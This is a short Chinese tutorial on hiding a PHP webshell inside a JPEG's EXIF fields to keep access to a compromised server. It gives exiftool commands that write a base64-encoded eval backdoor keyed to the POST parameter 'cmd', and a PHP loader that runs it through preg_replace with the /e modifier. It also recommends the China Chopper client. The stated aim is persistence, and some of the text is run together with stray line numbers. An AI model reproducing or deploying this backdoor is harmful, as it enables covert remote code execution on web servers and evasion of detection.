[TOC]
##意义
常见WebShell比较容易识别,利用图片exif信息可以达到隐藏WebShell的目的,以便持久化。(当然,这不是持久化的最好方法,不过作为临时持久化方法还是可以试试的)
##工具
- ExifTool
- 一句话木马
- 中国菜刀客户端
- 图片
##步骤
跟度娘要一张喜欢的图片
略了安装ExifTool
2.1 环境Kali
2.2 命令:apt-get install exiftool向图片中写入一句话木马
执行命令:exiftool "-comment=<test.php timg.jpg"exiftool "-model=/.*/e" timg.jpg
字符串:
aWYgKGlzc2V0KCRfUE9TVFsiY21kIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjbWQiXSkpO30=
Base64解码之后的东西,我就补贴出来了,总之密码是cmd
执行结果如下:
可以看到我们的一句话木马就写到了图片信息当中修改版一句话木马
1
2
3
4
$exif = exif_read_data('/www/web/phpshell_google_com/public_html/timg.jpg');
preg_replace($exif[Model],$exif[Make],'');GetShell
注意事项
[1] 图片路径可以是绝对路径,也可以是相对路径,如果是相对路径不要忘记./符号哦
[2] 测试PHP版本为5.5.根据大牛提示,preg_replace函数的/e选项在>5.6版本中废除,不过也有别的函数替代。思路是对的,注意函数使用。
[3] 不要长时间盯着苍老师的图片看,图有魔性~~
##参考
[1] https://www.trustwave.com/Resources/SpiderLabs-Blog/Hiding-Webshell-Backdoor-Code-in-Image-Files/
[2] https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html